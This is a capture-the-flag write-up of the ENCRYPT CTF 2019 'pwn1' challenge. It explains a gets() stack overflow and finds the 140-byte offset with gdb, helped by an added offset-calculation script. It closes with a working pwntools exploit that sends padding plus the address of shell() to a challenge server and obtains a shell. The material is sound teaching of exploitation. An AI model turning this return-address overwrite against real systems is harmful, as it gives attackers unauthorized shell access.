ENCRYPT CTF 2019 - pwn1 (Pwn 50)
First of all, I decompiled it by using Ghidra!!
- The main() function has a buffer overflow (BoF) vulnerability: there is no length check, and it reads input with gets() and echoes it with puts().
- The shell() function calls "/bin/sh".
So the tactic is to overwrite the return address with the address of shell() -> 0x80484b3.
Step 1: Identify the position of the return address.
-> Run pwn1 under gdb, and I input this string.
Tell me your name: 0123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
-> Segmentation fault occurred at 0x36373537
This means the saved return address sits after 140 bytes of padding: on 32-bit x86 the faulting address is stored little-endian, so 0x36373537 is the ASCII string "7576", which begins at offset 140 of the input ("0123456789" is 10 bytes, then the two-digit numbers 10..74 take 130 bytes).
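The offset arithmetic from Step 1, as an added example that is not part of the original write-up: it rebuilds the same counting pattern the author typed, packs the faulting EIP little-endian, and finds where those bytes sit in the pattern (the function names are my own).

```python
# Added example (not from the original write-up): recovers the padding length
# from a crash address the way Step 1 does, using the author's counting pattern.
import struct


def counting_pattern(limit: int = 99) -> bytes:
    """The string typed into gdb: "0123456789" followed by "10", "11", ... "99"."""
    return "".join(str(i) for i in range(limit + 1)).encode()


def offset_from_crash(eip: int, pattern: bytes) -> int:
    """Return the index in `pattern` of the 4 bytes that overwrote the saved EIP.

    x86 is little-endian, so p32(eip) reproduces the bytes in memory order;
    for 0x36373537 that is b"7576".
    """
    needle = struct.pack("<I", eip)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("crash address not found in pattern: wrong endianness or pattern too short")
    if pattern.find(needle, idx + 1) != -1:
        # A repeated 4-byte window would make the offset ambiguous; the
        # counting pattern happens to be unique here, but a longer input
        # should use a de Bruijn-style cyclic pattern instead.
        raise ValueError("crash bytes occur more than once in pattern")
    return idx


if __name__ == "__main__":
    pat = counting_pattern()
    print("pattern length:", len(pat))
    print("padding before saved EIP:", offset_from_crash(0x36373537, pat))  # 140
```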
Step 2: Write the script to win.
The following is my script.
# coding:utf-8
from pwn import remote, p32

host = "104.154.106.182"
port = 2345

r = remote(host, port)
r.recvuntil(b"Tell me your name: ")  # pwntools on Python 3 expects bytes
code = b"A" * 140                     # padding up to the saved return address
code += p32(0x80484b3)                # overwrite it with the address of shell()
print(code)
r.sendline(code)
r.interactive()                       # hand the shell over to us
I got the following result.
flag is: encryptCTF{Buff3R_0v3rfl0W5_4r3_345Y}
This is the first time I have got a PWN flag since joining my team.
Congrats to me ^^